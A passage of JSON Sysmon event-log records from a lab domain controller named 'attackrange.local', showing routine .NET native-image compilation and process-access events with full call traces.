C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:03.572","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7237,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:04.056\r\nProcessGuid: {E2A3D6B1-12F1-5F25-0000-001032970A00}\r\nProcessId: 4400\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1130-0\\System.Runtime.Serialization.dll\r\nCreationUtcTime: 2020-08-01 07:00:04.056","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:04.056","ProcessGuid":"{E2A3D6B1-12F1-5F25-0000-001032970A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1130-0\\System.Runtime.Serialization.dll","CreationUtcTime":"2020-08-01 07:00:04.056","EventReceivedTime":"2020-08-01 07:00:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7238,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:04.119\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F4-5F25-0000-0010499D0A00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:04.119","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F4-5F25-0000-0010499D0A00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7239,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:04.119\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F4-5F25-0000-0010499D0A00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:04.119","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F4-5F25-0000-0010499D0A00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7240,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:04.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F4-5F25-0000-0010499D0A00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:04.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F4-5F25-0000-0010499D0A00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7241,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:04.572\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:04.572","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7242,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:04.931\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F4-5F25-0000-0010DDA20A00}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:04.931","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F4-5F25-0000-0010DDA20A00}","TargetProcessId":"668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7243,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:04.931\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F4-5F25-0000-0010DDA20A00}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:04.931","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F4-5F25-0000-0010DDA20A00}","TargetProcessId":"668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7244,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:04.931\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F4-5F25-0000-0010DDA20A00}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 